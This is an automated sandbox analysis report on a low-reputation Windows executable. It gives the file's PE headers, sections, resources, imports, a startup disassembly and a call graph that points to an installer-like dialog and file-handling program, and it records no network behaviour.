Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:0ae9e38912ff6bd742a1b9e5c003576a

Entrypoint Preview

Instruction
call 00007F21E856102Bh
jmp 00007F21E85609DDh
int3
int3
int3
int3
int3
int3
push 00423A80h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [004407A8h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F21E8553871h
push 0043D14Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F21E8563685h
int3
jmp 00007F21E8565558h
push ebp
mov ebp, esp
and dword ptr [00463D58h], 00000000h
sub esp, 24h
or dword ptr [004407A0h], 01h
push 0000000Ah
call dword ptr [004341C4h]
test eax, eax
je 00007F21E8560D12h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]

Rich Headers

Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [IMP] VS2008 SP1 build 30729

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x3e3800x34.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3b40x50.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000xdff8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x23dc.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x3c1b00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x366a80x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x340000x278.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d85c0x120.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x32dbc0x32e0059fca22eb14bf065790ccabf936fb764False0.5921807816339066data6.705384121865264IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x340000xb1d00xb2003d7416119125f570d6c385b5ba208d7aFalse0.46034497893258425data5.270635796862559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x400000x247500x1200edc39ed5cd62e969c2b4607a1a95cf98False0.4058159722222222data4.083550519415643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat0x650000x1a40x200185ed7102f068a73891dd850643e3d14False0.46484375data3.50335535460232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x660000xdff80xe000699399d7d2e63f9a36984a221fc02f75False0.6373465401785714data6.63871928699419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x740000x23dc0x2400539b0c53eda4d1d9ffe2e69d5037d71fFalse0.7864583333333334data6.678617573231213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountryZLIB Complexity
PNG0x666500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
PNG0x671980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
RT_ICON0x687480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
RT_ICON0x68cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
RT_ICON0x695580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
RT_ICON0x6a4000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
RT_ICON0x6a8680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
RT_ICON0x6b9100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
RT_ICON0x6deb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
RT_DIALOG0x725880x286dataEnglishUnited States0.5092879256965944
RT_DIALOG0x723580x13adataEnglishUnited States0.60828025477707
RT_DIALOG0x724980xecdataEnglishUnited States0.6991525423728814
RT_DIALOG0x722280x12edataEnglishUnited States0.5927152317880795
RT_DIALOG0x71ef00x338dataEnglishUnited States0.45145631067961167
RT_DIALOG0x71c980x252dataEnglishUnited States0.5757575757575758
RT_STRING0x72f680x1e2dataEnglishUnited States0.3900414937759336
RT_STRING0x731500x1ccdataEnglishUnited States0.4282608695652174
RT_STRING0x733200x1b8dataEnglishUnited States0.45681818181818185
RT_STRING0x734d80x146dataEnglishUnited States0.5153374233128835
RT_STRING0x736200x46cdataEnglishUnited States0.3454063604240283
RT_STRING0x73a900x166dataEnglishUnited States0.49162011173184356
RT_STRING0x73bf80x152dataEnglishUnited States0.5059171597633136
RT_STRING0x73d500x10adataEnglishUnited States0.49624060150375937
RT_STRING0x73e600xbcdataEnglishUnited States0.6329787234042553
RT_STRING0x73f200xd6dataEnglishUnited States0.5747663551401869
RT_GROUP_ICON0x71c300x68dataEnglishUnited States0.7019230769230769
RT_MANIFEST0x728100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

Imports

DLLImport
KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

General

Target ID:0
Start time:09:36:17
Start date:30/09/2024
Path:C:\Users\user\Desktop\oJK2UKac7G.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\oJK2UKac7G.exe"
Imagebase:0xc90000
File size:331'935 bytes
MD5 hash:F708711B3C0F40E0202645136934EE1A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Disassembly

Reset < >

    Execution Graph

    Execution Coverage:9.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:10.2%
    Total number of Nodes:1522
    Total number of Limit Nodes:48
    execution_graph 24131 cac9c0 24132 cac9ca __EH_prolog 24131->24132 24297 c912f6 24132->24297 24135 caca0a 24138 caca21 24135->24138 24140 caca7b 24135->24140 24141 caca18 24135->24141 24136 cad0fb 24389 cae7de 24136->24389 24144 cacb0e GetDlgItemTextW 24140->24144 24150 caca91 24140->24150 24145 caca58 24141->24145 24146 caca1c 24141->24146 24142 cad116 SendMessageW 24143 cad124 24142->24143 24148 cad13e GetDlgItem SendMessageW 24143->24148 24149 cad12d SendDlgItemMessageW 24143->24149 24144->24145 24147 cacb4b 24144->24147 24145->24138 24151 cacb3f KiUserCallbackDispatcher 24145->24151 24146->24138 24155 c9f937 53 API calls 24146->24155 24152 cacb60 GetDlgItem 24147->24152 24295 cacb54 24147->24295 24407 cab64d GetCurrentDirectoryW 24148->24407 24149->24148 24154 c9f937 53 API calls 24150->24154 24151->24138 24156 cacb97 SetFocus 24152->24156 24157 cacb74 SendMessageW SendMessageW 24152->24157 24159 cacaae SetDlgItemTextW 24154->24159 24160 caca3b 24155->24160 24163 cacba7 24156->24163 24174 cacbb3 24156->24174 24157->24156 24158 cad16e GetDlgItem 24161 cad18b 24158->24161 24162 cad191 SetWindowTextW 24158->24162 24164 cacab9 24159->24164 24429 c9122f SHGetMalloc 24160->24429 24161->24162 24408 cabbb0 GetClassNameW 24162->24408 24169 c9f937 53 API calls 24163->24169 24164->24138 24171 cacac6 GetMessageW 24164->24171 24166 caca42 24166->24138 24175 cad3e8 SetDlgItemTextW 24166->24175 24167 cad041 24170 c9f937 53 API calls 24167->24170 24173 cacbb1 24169->24173 24176 cad051 SetDlgItemTextW 24170->24176 24171->24138 24177 cacadd IsDialogMessageW 24171->24177 24308 cae607 24173->24308 24183 c9f937 53 API calls 24174->24183 24175->24138 24180 cad065 24176->24180 24177->24164 24181 cacaec TranslateMessage DispatchMessageW 24177->24181 24187 c9f937 53 API calls 24180->24187 24181->24164 24186 cacbea 24183->24186 24184 cacc0d 24191 cacc41 24184->24191 24430 c9b4c1 24184->24430 24185 cad1dc 24189 cad20c 24185->24189 24193 c9f937 53 API calls 24185->24193 24190 c94a20 _swprintf 51 API calls 24186->24190 24216 cad088 _wcslen 24187->24216 24188 cad872 98 API calls 24188->24185 24194 cad2c4 24189->24194 24198 cad872 98 API calls 24189->24198 24190->24173 24319 c9b341 24191->24319 24197 cad1ef SetDlgItemTextW 24193->24197 24230 cad355 24194->24230 24241 c9f937 53 API calls 24194->24241 24244 cad374 24194->24244 24204 c9f937 53 API calls 24197->24204 24205 cad227 24198->24205 24200 cad389 24208 cad3a6 24200->24208 24459 c912b3 GetDlgItem EnableWindow 24200->24459 24201 cad380 EnableWindow 24201->24200 24202 cacc5a GetLastError 24203 cacc65 24202->24203 24325 cabc09 SetCurrentDirectoryW 24203->24325 24210 cad203 SetDlgItemTextW 24204->24210 24231 cad252 24205->24231 24440 caaee5 ShowWindow 24205->24440 24206 cacc3b 24433 cabeef CreateDirectoryW LocalFree GetCurrentProcess GetLastError 24206->24433 24223 cad3cd 24208->24223 24224 cad3c5 SendMessageW 24208->24224 24210->24189 24211 c9f937 53 API calls 24211->24138 24212 cad2b7 24218 cad872 98 API calls 24212->24218 24214 cacc79 24217 cacc82 GetLastError 24214->24217 24225 cacc90 24214->24225 24215 cad39c 24460 c912b3 GetDlgItem EnableWindow 24215->24460 24222 c9f937 53 API calls 24216->24222 24242 cad0d9 24216->24242 24217->24225 24218->24194 24220 c9f937 53 API calls 24220->24166 24227 cad0bc 24222->24227 24223->24138 24223->24220 24224->24223 24226 cacd07 24225->24226 24229 cacd16 24225->24229 24232 cacca0 GetTickCount 24225->24232 24228 cacf42 24226->24228 24226->24229 24233 c94a20 _swprintf 51 API calls 24227->24233 24344 c912d1 GetDlgItem ShowWindow 24228->24344 24234 cacee7 24229->24234 24235 cacd2f GetModuleFileNameW 24229->24235 24236 cacedd 24229->24236 24238 caaee5 40 API calls 24230->24238 24231->24212 24246 cad872 98 API calls 24231->24246 24326 c94a20 24232->24326 24233->24242 24245 c9f937 53 API calls 24234->24245 24434 ca05e6 83 API calls 24235->24434 24236->24145 24236->24234 24238->24244 24240 caccbd 24329 c9a8ce 24240->24329 24241->24194 24242->24211 24244->24200 24244->24201 24249 cacef1 24245->24249 24250 cad28c 24246->24250 24247 cacf52 24345 c912d1 GetDlgItem ShowWindow 24247->24345 24254 c94a20 _swprintf 51 API calls 24249->24254 24250->24212 24255 cad295 DialogBoxParamW 24250->24255 24251 cacd57 24253 c94a20 _swprintf 51 API calls 24251->24253 24252 cacf5c 24346 c9f937 24252->24346 24256 cacd79 CreateFileMappingW 24253->24256 24259 cacf0f 24254->24259 24255->24145 24255->24212 24262 cacdd7 GetCommandLineW 24256->24262 24290 cace4e __InternalCxxFrameHandler 24256->24290 24270 c9f937 53 API calls 24259->24270 24261 cacce3 24265 caccea GetLastError 24261->24265 24266 caccf5 24261->24266 24263 cacde8 24262->24263 24435 cac605 SHGetMalloc 24263->24435 24265->24266 24337 c9a801 24266->24337 24267 cacf78 SetDlgItemTextW GetDlgItem 24271 cacfad 24267->24271 24272 cacf95 GetWindowLongW SetWindowLongW 24267->24272 24274 cacf29 24270->24274 24351 cad872 24271->24351 24272->24271 24273 cace04 24436 cac605 SHGetMalloc 24273->24436 24278 cace10 24437 cac605 SHGetMalloc 24278->24437 24279 cad872 98 API calls 24281 cacfc9 24279->24281 24377 caeb92 24281->24377 24282 cace1c 24438 ca0695 83 API calls 24282->24438 24283 caceb7 24283->24236 24289 cacecd UnmapViewOfFile CloseHandle 24283->24289 24287 cace2d MapViewOfFile 24287->24290 24289->24236 24290->24283 24291 cacea3 Sleep 24290->24291 24291->24283 24291->24290 24295->24145 24295->24167 24298 c91358 24297->24298 24299 c912ff 24297->24299 24462 c9f5e1 GetWindowLongW SetWindowLongW 24298->24462 24301 c91365 24299->24301 24461 c9f608 62 API calls 2 library calls 24299->24461 24301->24135 24301->24136 24301->24138 24303 c91321 24303->24301 24304 c91327 GetParent 24303->24304 24304->24301 24305 c91334 GetDlgItem 24304->24305 24305->24301 24306 c91344 24305->24306 24306->24301 24307 c9134a SetWindowTextW 24306->24307 24307->24301 24463 cac748 PeekMessageW 24308->24463 24311 cae669 SendMessageW SendMessageW 24314 cae6c4 SendMessageW SendMessageW SendMessageW 24311->24314 24315 cae6a5 24311->24315 24312 cae635 24468 caa235 24312->24468 24317 cae71a SendMessageW 24314->24317 24318 cae6f7 SendMessageW 24314->24318 24315->24314 24317->24184 24318->24317 24321 c9b34b 24319->24321 24320 c9b3dc 24322 c9b542 8 API calls 24320->24322 24324 c9b405 24320->24324 24321->24320 24321->24324 24471 c9b542 24321->24471 24322->24324 24324->24202 24324->24203 24325->24214 24498 c949f3 24326->24498 24330 c9a8d8 24329->24330 24331 c9a935 CreateFileW 24330->24331 24332 c9a929 24330->24332 24331->24332 24333 c9a97f 24332->24333 24334 c9cf32 GetCurrentDirectoryW 24332->24334 24333->24261 24335 c9a964 24334->24335 24335->24333 24336 c9a968 CreateFileW 24335->24336 24336->24333 24338 c9a825 24337->24338 24343 c9a836 24337->24343 24339 c9a838 24338->24339 24340 c9a831 24338->24340 24338->24343 24583 c9a880 24339->24583 24578 c9a9ae 24340->24578 24343->24226 24344->24247 24345->24252 24347 c9f947 24346->24347 24598 c9f968 24347->24598 24350 c912d1 GetDlgItem ShowWindow 24350->24267 24352 cad87c __EH_prolog 24351->24352 24353 cacfbb 24352->24353 24621 cac4f4 ExpandEnvironmentStringsW 24352->24621 24353->24279 24357 cadb9a SetWindowTextW 24362 cad8b3 _wcslen _wcsrchr 24357->24362 24362->24353 24362->24357 24363 cad988 SetFileAttributesW 24362->24363 24367 cadd3f 24362->24367 24622 ca3306 CompareStringW 24362->24622 24623 cab64d GetCurrentDirectoryW 24362->24623 24625 c9b9ca 6 API calls 24362->24625 24626 c9b953 FindClose 24362->24626 24627 cac66e 77 API calls 2 library calls 24362->24627 24628 cb520e 24362->24628 24641 cac4f4 ExpandEnvironmentStringsW 24362->24641 24364 cada42 GetFileAttributesW 24363->24364 24376 cad9a2 __cftof _wcslen 24363->24376 24364->24362 24368 cada54 DeleteFileW 24364->24368 24367->24362 24369 cadd64 GetDlgItem SetWindowTextW SendMessageW 24367->24369 24372 cadda4 SendMessageW 24367->24372 24368->24362 24370 cada65 24368->24370 24369->24367 24371 c94a20 _swprintf 51 API calls 24370->24371 24373 cada85 GetFileAttributesW 24371->24373 24372->24362 24373->24370 24374 cada9a MoveFileW 24373->24374 24374->24362 24375 cadab2 MoveFileExW 24374->24375 24375->24362 24376->24362 24376->24364 24624 c9cdc0 51 API calls 2 library calls 24376->24624 24378 caeb9c __EH_prolog 24377->24378 24653 ca197c 24378->24653 24380 caebcd 24657 c964ed 24380->24657 24382 caebeb 24661 c98823 24382->24661 24386 caec3e 24679 c9890a 24386->24679 24390 cae7e8 24389->24390 25215 cab5c6 24390->25215 24393 cad101 24393->24142 24393->24143 24394 cae7f5 GetWindow 24394->24393 24399 cae815 24394->24399 24395 cae822 GetClassNameW 25220 ca3306 CompareStringW 24395->25220 24397 cae8aa GetWindow 24397->24393 24397->24399 24398 cae846 GetWindowLongW 24398->24397 24400 cae856 SendMessageW 24398->24400 24399->24393 24399->24395 24399->24397 24399->24398 24400->24397 24401 cae86c GetObjectW 24400->24401 25221 cab605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24401->25221 24403 cae883 25222 cab5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24403->25222 25223 cab80c 9 API calls 24403->25223 24406 cae894 SendMessageW DeleteObject 24406->24397 24407->24158 24409 cabbd1 24408->24409 24415 cabbf6 24408->24415 25226 ca3306 CompareStringW 24409->25226 24410 cabbfb SHAutoComplete 24411 cabc04 24410->24411 24416 cac207 24411->24416 24413 cabbe4 24414 cabbe8 FindWindowExW 24413->24414 24413->24415 24414->24415 24415->24410 24415->24411 24417 cac211 __EH_prolog 24416->24417 24418 c913f8 43 API calls 24417->24418 24419 cac233 24418->24419 25227 c92083 24419->25227 24422 cac25c 24425 c91a7e 143 API calls 24422->24425 24423 cac24d 24424 c91641 87 API calls 24423->24424 24426 cac258 24424->24426 24428 cac27b __InternalCxxFrameHandler ___std_exception_copy 24425->24428 24426->24185 24426->24188 24427 c91641 87 API calls 24427->24426 24428->24427 24429->24166 25235 c9b4d3 24430->25235 24433->24191 24434->24251 24435->24273 24436->24278 24437->24282 24438->24287 25243 caac14 LoadCursorW RegisterClassExW 24440->25243 24442 caaf0f 24443 caaf25 24442->24443 25244 cb8a08 26 API calls 2 library calls 24442->25244 24447 caaf3d GetWindowRect GetParent MapWindowPoints 24443->24447 25245 cb8a08 26 API calls 2 library calls 24443->25245 24448 caaf80 GetParent CreateWindowExW 24447->24448 24449 caaf77 DestroyWindow 24447->24449 24450 caafcb 24448->24450 24451 cab008 24448->24451 24449->24448 24450->24451 24454 caafd0 24450->24454 24452 cab01e 24451->24452 24453 cab00c ShowWindow UpdateWindow 24451->24453 24452->24231 24453->24452 24454->24452 25246 caad0e CompareStringW _wcslen ___std_exception_copy 24454->25246 24456 caafe8 24456->24452 24457 caafee ShowWindow SetWindowTextW 24456->24457 24458 cab005 24457->24458 24458->24452 24459->24215 24460->24208 24461->24303 24462->24301 24464 cac79c GetDlgItem 24463->24464 24465 cac763 KiUserCallbackDispatcher 24463->24465 24464->24311 24464->24312 24466 cac788 TranslateMessage DispatchMessageW 24465->24466 24467 cac779 IsDialogMessageW 24465->24467 24466->24464 24467->24464 24467->24466 24469 caa24b ShowWindow SendMessageW SendMessageW 24468->24469 24470 caa23e DestroyWindow 24468->24470 24469->24311 24470->24469 24472 c9b54f 24471->24472 24473 c9b573 24472->24473 24474 c9b566 CreateDirectoryW 24472->24474 24475 c9b4c1 3 API calls 24473->24475 24474->24473 24476 c9b5a6 24474->24476 24477 c9b579 24475->24477 24479 c9b5b5 24476->24479 24488 c9b8e6 24476->24488 24478 c9b5b9 GetLastError 24477->24478 24484 c9cf32 24477->24484 24478->24479 24479->24321 24482 c9b58f 24482->24478 24483 c9b593 CreateDirectoryW 24482->24483 24483->24476 24483->24478 24485 c9cf3f _wcslen 24484->24485 24486 c9cfe7 GetCurrentDirectoryW 24485->24486 24487 c9cf68 _wcslen 24485->24487 24486->24487 24487->24482 24496 caffc0 24488->24496 24491 c9b909 24493 c9cf32 GetCurrentDirectoryW 24491->24493 24492 c9b936 24492->24479 24494 c9b91d 24493->24494 24494->24492 24495 c9b921 SetFileAttributesW 24494->24495 24495->24492 24497 c9b8f3 SetFileAttributesW 24496->24497 24497->24491 24497->24492 24499 c94a0a __vsnwprintf_l 24498->24499 24502 cb72d2 24499->24502 24505 cb5395 24502->24505 24506 cb53bd 24505->24506 24507 cb53d5 24505->24507 24529 cba7db 20 API calls __dosmaperr 24506->24529 24507->24506 24509 cb53dd 24507->24509 24531 cb5934 24509->24531 24510 cb53c2 24530 cb51a9 26 API calls ___std_exception_copy 24510->24530 24516 cb5465 24540 cb5ce4 51 API calls 3 library calls 24516->24540 24517 c94a14 24517->24240 24520 cb53cd 24522 cb0d6c 24520->24522 24521 cb5470 24541 cb59b7 20 API calls _free 24521->24541 24523 cb0d75 IsProcessorFeaturePresent 24522->24523 24524 cb0d74 24522->24524 24526 cb0db7 24523->24526 24524->24517 24542 cb0d7a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24526->24542 24528 cb0e9a 24528->24517 24529->24510 24530->24520 24532 cb5951 24531->24532 24538 cb53ed 24531->24538 24532->24538 24543 cba505 GetLastError 24532->24543 24534 cb5972 24564 cbaae6 38 API calls __fassign 24534->24564 24536 cb598b 24565 cbab13 38 API calls __fassign 24536->24565 24539 cb58ff 20 API calls 2 library calls 24538->24539 24539->24516 24540->24521 24541->24520 24542->24528 24544 cba51b 24543->24544 24545 cba527 24543->24545 24566 cbc00b 11 API calls 2 library calls 24544->24566 24567 cbc2e6 20 API calls __dosmaperr 24545->24567 24548 cba521 24548->24545 24550 cba570 SetLastError 24548->24550 24549 cba533 24551 cba53b 24549->24551 24574 cbc061 11 API calls 2 library calls 24549->24574 24550->24534 24568 cba65a 24551->24568 24554 cba550 24554->24551 24555 cba557 24554->24555 24575 cba370 20 API calls __dosmaperr 24555->24575 24556 cba541 24558 cba57c SetLastError 24556->24558 24576 cba0e4 38 API calls _abort 24558->24576 24559 cba562 24561 cba65a _free 20 API calls 24559->24561 24563 cba569 24561->24563 24563->24550 24563->24558 24564->24536 24565->24538 24566->24548 24567->24549 24569 cba665 RtlFreeHeap 24568->24569 24573 cba68e __dosmaperr 24568->24573 24570 cba67a 24569->24570 24569->24573 24577 cba7db 20 API calls __dosmaperr 24570->24577 24572 cba680 GetLastError 24572->24573 24573->24556 24574->24554 24575->24559 24577->24572 24579 c9a9e1 24578->24579 24582 c9a9b7 24578->24582 24579->24343 24582->24579 24589 c9b470 24582->24589 24584 c9a88c 24583->24584 24586 c9a8aa 24583->24586 24584->24586 24587 c9a898 CloseHandle 24584->24587 24585 c9a8c9 24585->24343 24586->24585 24597 c97685 77 API calls 24586->24597 24587->24586 24590 caffc0 24589->24590 24591 c9b47d DeleteFileW 24590->24591 24592 c9a9df 24591->24592 24593 c9b490 24591->24593 24592->24343 24594 c9cf32 GetCurrentDirectoryW 24593->24594 24595 c9b4a4 24594->24595 24595->24592 24596 c9b4a8 DeleteFileW 24595->24596 24596->24592 24597->24585 24604 c9ecd0 24598->24604 24601 c9f98b LoadStringW 24602 c9f965 SetDlgItemTextW 24601->24602 24603 c9f9a2 LoadStringW 24601->24603 24602->24350 24603->24602 24609 c9ec0c 24604->24609 24606 c9ed02 24606->24601 24606->24602 24607 c9eced 24607->24606 24617 c9ed10 26 API calls 24607->24617 24610 c9ec24 24609->24610 24616 c9eca4 _strncpy 24609->24616 24612 c9ec48 24610->24612 24618 ca30e5 WideCharToMultiByte 24610->24618 24615 c9ec79 24612->24615 24619 c9f8d1 50 API calls __vsnprintf 24612->24619 24620 cb7561 26 API calls 3 library calls 24615->24620 24616->24607 24617->24606 24618->24612 24619->24615 24620->24616 24621->24362 24622->24362 24623->24362 24624->24376 24625->24362 24626->24362 24627->24362 24629 cba694 24628->24629 24630 cba6ac 24629->24630 24631 cba6a1 24629->24631 24633 cba6b4 24630->24633 24639 cba6bd __dosmaperr 24630->24639 24642 cba7ee 24631->24642 24634 cba65a _free 20 API calls 24633->24634 24637 cba6a9 24634->24637 24635 cba6c2 24649 cba7db 20 API calls __dosmaperr 24635->24649 24636 cba6e7 HeapReAlloc 24636->24637 24636->24639 24637->24362 24639->24635 24639->24636 24650 cb8e4c 7 API calls 2 library calls 24639->24650 24641->24362 24643 cba82c 24642->24643 24647 cba7fc __dosmaperr 24642->24647 24652 cba7db 20 API calls __dosmaperr 24643->24652 24645 cba817 RtlAllocateHeap 24646 cba82a 24645->24646 24645->24647 24646->24637 24647->24643 24647->24645 24651 cb8e4c 7 API calls 2 library calls 24647->24651 24649->24637 24650->24639 24651->24647 24652->24646 24654 ca1989 _wcslen 24653->24654 24688 c91895 24654->24688 24656 ca19a1 24656->24380 24658 ca197c _wcslen 24657->24658 24659 c91895 79 API calls 24658->24659 24660 ca19a1 24659->24660 24660->24382 24662 c9882d __EH_prolog 24661->24662 24701 c9e298 24662->24701 24664 c98855 24711 cafeae 24664->24711 24666 c98899 __cftof 24667 cafeae 27 API calls 24666->24667 24668 c988c0 24667->24668 24724 ca5c54 24668->24724 24671 c98a38 24672 c98a42 24671->24672 24673 c98ab5 24672->24673 24776 c9b966 24672->24776 24676 c98b1a 24673->24676 24754 c990a2 24673->24754 24675 c98b5c 24675->24386 24676->24675 24782 c91397 75 API calls 24676->24782 25201 c9a41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 24679->25201 24681 c9892b 24683 c9893c Concurrency::cancel_current_task 24681->24683 25202 ca3536 24681->25202 24684 c92111 26 API calls 24683->24684 24685 c98963 24684->24685 25206 c9e339 87 API calls Concurrency::cancel_current_task 24685->25206 24690 c918a7 24688->24690 24695 c918ff 24688->24695 24689 c918d0 24691 cb520e 22 API calls 24689->24691 24690->24689 24698 c976e9 77 API calls __vswprintf_c_l 24690->24698 24693 c918f0 24691->24693 24693->24695 24700 c9775a 76 API calls 24693->24700 24694 c918c6 24699 c9775a 76 API calls 24694->24699 24695->24656 24698->24694 24699->24689 24700->24695 24702 c9e2a2 __EH_prolog 24701->24702 24703 cafeae 27 API calls 24702->24703 24704 c9e2e5 24703->24704 24705 c9e2f8 24704->24705 24706 c96891 41 API calls 24704->24706 24707 cafeae 27 API calls 24705->24707 24706->24705 24708 c9e309 24707->24708 24709 